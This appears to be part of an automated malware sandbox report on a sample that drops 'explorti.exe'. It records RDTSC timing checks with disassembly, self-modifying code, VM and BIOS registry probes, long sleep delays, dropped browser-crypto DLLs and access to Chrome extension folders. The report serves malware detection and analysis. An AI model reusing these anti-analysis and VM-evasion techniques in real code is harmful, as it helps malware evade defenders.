                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B639 second address: 36B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B79F second address: 36B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F34D8F44CC9h 0x0000000a jnc 00007F34D8F44CB6h 0x00000010 js 00007F34D8F44CB6h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F34D8F44CC5h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007F34D8F44CCBh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B804 second address: 36B80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B933 second address: 36B93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36B93D second address: 36B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36DF7F second address: 36E00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D8F44CBAh 0x00000010 jnp 00007F34D8F44CB6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D8F44CB8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D8F44CC2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D8F44CB6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E106 second address: 36E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E10A second address: 36E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E10F second address: 36E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E11F second address: 36E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D8F44CBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E135 second address: 36E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D94219E0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D94219E0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D94219E0h 0x0000001f pop eax 0x00000020 call 00007F34D94219E5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D94219D9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D94219D9h 0x0000004e push edi 0x0000004f jmp 00007F34D94219DEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D94219DDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D94219E2h 0x00000067 jp 00007F34D94219DCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D94219E6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D94219D6h 0x00000081 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E213 second address: 36E272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D8F44CB8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D8F44CBDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D8F44CBCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E36C second address: 36E385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E385 second address: 36E38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D8F44CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E38F second address: 36E40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D94219E5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D94219D8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D94219DFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D94219D6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E40E second address: 36E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D8F44CC1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 36E443 second address: 36E45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB38 second address: 35EB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D8F44CB6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB42 second address: 35EB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB48 second address: 35EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB50 second address: 35EB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB54 second address: 35EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D8F44CB6h 0x00000017 jmp 00007F34D8F44CBBh 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 35EB77 second address: 35EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 38C61C second address: 38C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 38C620 second address: 38C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 38C626 second address: 38C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D8F44CC7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D8F44CB6h 0x0000001a jno 00007F34D8F44CB6h 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 38C658 second address: 38C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 38C7C4 second address: 38C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSpecial instruction interceptor: First address: A7E68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSpecial instruction interceptor: First address: A7E75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSpecial instruction interceptor: First address: C11391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSpecial instruction interceptor: First address: C1AFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeSpecial instruction interceptor: First address: C97CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 1FE68E instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 1FE75F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 391391 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 39AFC7 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 417CFA instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeCode function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 715Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 1820Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 3774Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 427Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.8 %
                        Source: C:\Users\user\Desktop\file.exe TID: 6432Thread sleep count: 715 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588Thread sleep count: 31 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588Thread sleep time: -62031s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592Thread sleep count: 43 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592Thread sleep time: -86043s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552Thread sleep count: 427 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552Thread sleep time: -12810000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572Thread sleep count: 43 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572Thread sleep time: -86043s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7664Thread sleep time: -360000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7568Thread sleep time: -34017s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C60C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C60C930
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
                        Source: explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd@&h
                        Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vmware
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: explorti.exe, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
                        Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
